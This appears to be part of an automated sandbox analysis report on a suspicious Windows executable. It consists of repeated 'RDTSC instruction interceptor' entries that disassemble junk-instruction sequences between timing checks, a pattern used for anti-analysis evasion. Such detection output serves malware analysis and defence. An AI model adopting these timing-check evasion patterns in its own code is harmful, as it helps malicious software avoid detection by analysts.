Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C314A9 second address: C314BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F2A9129471Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C314BA second address: C314D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F2A913FCE96h 0x0000000a jmp 00007F2A913FCE9Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C31A9B second address: C31ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 jmp 00007F2A91294726h 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C31ABF second address: C31AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C31AC5 second address: C31ACB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C31ACB second address: C31AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C38835 second address: C3883A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C37A25 second address: C37A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C37A29 second address: C37A4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2A9129471Fh 0x00000008 jmp 00007F2A9129471Ch 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C380F0 second address: C3810B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f jc 00007F2A913FCE98h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C3810B second address: C3810F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C3810F second address: C3812B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C3812B second address: C3813C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F2A91294716h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C3813C second address: C38140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C44CE7 second address: C44CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C44CEB second address: C44CFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2A913FCE9Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C44E78 second address: C44E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F2A91294718h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C44E89 second address: C44EA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C44EA0 second address: C44EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C44EA4 second address: C44EA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C44FFC second address: C45012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2A9129471Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C45012 second address: C45016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C45016 second address: C45034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F2A9129472Ch 0x0000000c jmp 00007F2A91294720h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C45169 second address: C4516D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C45B7C second address: C45B8C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2A91294716h 0x00000008 jno 00007F2A91294716h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C462D6 second address: C462DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C44194 second address: C4419F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2A91294716h 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C5B180 second address: C5B198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 jnl 00007F2A913FCE96h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jnl 00007F2A913FCE96h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C5B198 second address: C5B19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C5E3E6 second address: C5E3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C67727 second address: C67752 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294724h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F2A9129471Fh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C6A873 second address: C6A892 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F2A913FCEACh 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C7136B second address: C71379 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F2A91294716h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C71379 second address: C7137D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C7137D second address: C71383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C71383 second address: C7138D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F2A913FCE96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C71175 second address: C7117A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C7117A second address: C71198 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2A913FCE9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2A913FCE9Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C772ED second address: C772F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C772F1 second address: C772F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C772F5 second address: C77323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F2A9129471Ch 0x0000000e popad 0x0000000f jnp 00007F2A9129472Eh 0x00000015 pushad 0x00000016 jmp 00007F2A9129471Eh 0x0000001b push esi 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C778C8 second address: C778DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCE9Ch 0x00000007 jne 00007F2A913FCE96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C778DE second address: C778E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C778E6 second address: C778F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCE9Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C778F7 second address: C77917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2A9129471Ah 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jl 00007F2A91294736h 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C77917 second address: C77921 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C77921 second address: C77927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C77927 second address: C7792B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B8EC29 second address: B8EC2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C963B0 second address: C963D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F2A913FCEADh 0x0000000c jmp 00007F2A913FCEA5h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C963D3 second address: C96434 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2A9129472Ah 0x00000008 push esi 0x00000009 jmp 00007F2A9129471Eh 0x0000000e jno 00007F2A91294716h 0x00000014 pop esi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push esi 0x00000019 pushad 0x0000001a popad 0x0000001b pop esi 0x0000001c jmp 00007F2A91294726h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F2A9129471Eh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C96434 second address: C96438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C96438 second address: C9643C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C96274 second address: C96287 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2A913FCE9Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C96287 second address: C9628F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C981E2 second address: C981E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C981E7 second address: C981F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2A91294716h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C981F1 second address: C981F7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CAD039 second address: CAD052 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2A91294716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F2A9129471Bh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CAD052 second address: CAD05C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2A913FCE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CAD05C second address: CAD068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F2A91294716h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CAD068 second address: CAD06C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CAD5B3 second address: CAD5F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294721h 0x00000007 pushad 0x00000008 jno 00007F2A91294716h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jnl 00007F2A91294716h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007F2A9129472Ah 0x00000021 push eax 0x00000022 push edx 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CAD5F8 second address: CAD5FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CAD5FC second address: CAD602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CADAA5 second address: CADAB5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2A913FCEA2h 0x00000008 js 00007F2A913FCE96h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CADC2E second address: CADC4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A9129471Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a ja 00007F2A91294716h 0x00000010 jng 00007F2A91294716h 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CB227C second address: CB2280 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CB242A second address: CB242F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CB24AD second address: CB24B7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2A913FCE9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CB24B7 second address: CB24E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D3632h], eax 0x0000000d jnl 00007F2A9129471Ah 0x00000013 mov dx, F974h 0x00000017 push 00000004h 0x00000019 xor edx, dword ptr [ebp+122D34ABh] 0x0000001f mov dh, 62h 0x00000021 push A4259E95h 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push edx 0x0000002a pop edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BCAB4E second address: BCAB52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B603F8 second address: 4B603FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B603FC second address: 4B60417 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B60417 second address: 4B6043B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B6043B second address: 4B6043F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B6043F second address: 4B60459 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294726h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B904B1 second address: 4B904C2 instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx esi, di 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B904C2 second address: 4B904C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B904C6 second address: 4B904CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B904CA second address: 4B904D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B904D0 second address: 4B90512 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F2A913FCEA0h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F2A913FCEA7h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B90512 second address: 4B905C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F2A9129471Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov bx, BB34h 0x00000015 pushfd 0x00000016 jmp 00007F2A9129471Dh 0x0000001b or eax, 282D92F6h 0x00000021 jmp 00007F2A91294721h 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, ecx 0x00000029 jmp 00007F2A9129471Eh 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 mov al, 20h 0x00000032 pushfd 0x00000033 jmp 00007F2A91294723h 0x00000038 jmp 00007F2A91294723h 0x0000003d popfd 0x0000003e popad 0x0000003f push eax 0x00000040 jmp 00007F2A91294729h 0x00000045 xchg eax, esi 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 mov edi, ecx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B905C7 second address: 4B905E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 5739E808h 0x00000009 popad 0x0000000a lea eax, dword ptr [ebp-04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2A913FCE9Ah 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B905E0 second address: 4B90607 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A9129471Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2A91294725h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B90607 second address: 4B90617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A913FCE9Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B90617 second address: 4B90625 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B90625 second address: 4B9062C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B9062C second address: 4B9065C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294722h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2A91294727h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B906BA second address: 4B906BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B906BE second address: 4B906C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B906C4 second address: 4B9071F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCE9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F2A913FCE9Eh 0x00000014 adc cx, 2BD8h 0x00000019 jmp 00007F2A913FCE9Bh 0x0000001e popfd 0x0000001f push ecx 0x00000020 mov eax, edx 0x00000022 pop ebx 0x00000023 popad 0x00000024 mov esi, eax 0x00000026 jmp 00007F2A913FCE9Eh 0x0000002b je 00007F2A913FCEFDh 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 movsx edi, ax 0x00000037 push esi 0x00000038 pop edi 0x00000039 popad 0x0000003a rdtsc
